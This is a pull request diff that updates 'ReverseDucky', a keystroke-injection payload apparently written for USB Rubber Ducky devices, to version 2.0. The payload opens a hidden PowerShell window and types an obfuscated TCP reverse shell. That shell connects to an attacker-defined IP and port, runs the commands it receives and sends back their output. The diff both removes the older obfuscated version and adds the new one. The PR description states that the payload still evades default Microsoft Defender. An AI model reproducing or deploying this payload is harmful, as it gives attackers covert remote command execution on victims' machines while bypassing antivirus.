### PR TITLE
Updated ReverseDucky to version 2.0

### DIFF
--- a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
+++ b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
@@ -1,25 +1,47 @@
 REM       ReverseDucky
-REM       Version 1.3
+REM       Version 2.0
 REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
 REM       Author: 0iphor13
+REM       Requirement: DuckyScript 3.0
 
-REM       Reverse shell executed in the background
-REM       Fill in Attacker IP & Port in line 18
+REM       TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
+REM       Define the attacker IP and PORT at line 38 & 39
 REM       DON'T FORGET TO START LISTENER
+
+REM Extension DETECT_READY by Korben for best and fastest deployment
+EXTENSION DETECT_READY
+    REM VERSION 1.0
+
+    REM USAGE:
+    REM Extension runs inline (here)
+    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+    REM boot delay
+
+    REM TARGETS:
+    REM Any system that reflects CAPSLOCK will detect minimum required delay
+    REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+
+    REM CONFIGURATION:
+    DEFINE RESPONSE_DELAY 25
+    DEFINE ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Define the attackers IP & Port
+DEFINE ADDRESS '0.0.0.0'
+DEFINE PORT 4444
 
 DELAY 1500
 GUI r
 DELAY 500
-STRING powershell -NoP -NonI -W hidden
-DELAY 250
-ENTER
-
-DELAY 200
-STRING $I='ATTACKER-IP';$P=PORT;$0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient
-DELAY 200
-STRING ($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'jec
-DELAY 200
-STRING t') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Reve
-DELAY 200
-STRING rseDucky '+(&('g'+'l'))+'~ ';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close()
-ENTER
+STRINGLN powershell -NoP -NonI -w h
+DELAY 500
+STRINGLN $0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky@PS '+(&('g'+'l'))+'> ';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close();exit
+CAPSLOCK

--- a/payloads/library/remote_access/ReverseDuckyIII/payload.txt
+++ b/payloads/library/remote_access/ReverseDuckyIII/payload.txt
@@ -1,5 +1,5 @@
 REM       ReverseDucky3
-REM       Version 1.2
+REM       Version 1.2 (End of Life - This payload won't be updated anymore)
 REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
 REM       Author: 0iphor13
 


### PR DESCRIPTION
Updated ReverseDucky to use DuckyScript 3.0.
-Increased reliability 
-more verbosity
-easier to use

Still defeats default MS Defender